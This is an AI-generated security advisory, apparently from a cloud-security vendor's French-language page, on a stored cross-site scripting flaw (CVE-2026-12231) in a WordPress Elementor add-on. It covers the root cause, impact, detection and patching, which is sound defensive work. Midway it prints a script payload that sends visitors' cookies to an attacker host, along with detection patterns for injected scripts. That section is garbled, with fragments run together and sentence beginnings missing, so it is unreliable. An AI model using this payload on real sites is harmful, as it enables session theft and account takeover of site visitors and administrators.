
PEACH
Un cadre d’isolation des locataires
CVE-2026-12231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Exclusive Addons for Elementor plugin for WordPress, affecting all versions up to and including 2.7.9.8. The flaw exists in the exad_infobox_image parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on August 2, 2026, with a patch made available the same day. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from the plugin's failure to properly sanitize user-supplied input in the exad_infobox_image parameter and escape it before rendering in HTML output. The vulnerable code is located in the plugin's infobox.php file (lines 975, 1019–1095, and 1082), where attacker-controlled values are written directly into the page without adequate filtering. Exploitation requires only network access and a low-privilege authenticated account (Contributor or above), with no user interaction needed and a changed scope, meaning the injected script can affect users beyond the attacker's own session (GitHub Advisory, WordPress Trac).
Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all users who visit the affected pages. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and modification of page content. While availability is not directly impacted, the confidentiality and integrity risks extend to all site visitors, including privileged users (GitHub Advisory, Wordfence).
"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the exad_infobox_image parameter, which is not properly sanitized.exad_infobox_image field.<script> tags or JavaScript event handlers within Infobox widget content.%3Cscript%3E, javascript:, onerror=) in stored post meta values associated with the exad_infobox_image parameter in the WordPress database (wp_postmeta table).Update the Exclusive Addons for Elementor plugin to a version beyond 2.7.9.8, as a patch was released on August 2, 2026 (changeset 3583929). As an interim measure, restrict Contributor-level and above access to only trusted users, and implement Content Security Policy (CSP) headers to limit inline script execution. Administrators should audit recent content modifications for injected scripts and review accounts with Contributor access (WordPress Trac, Wordfence).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."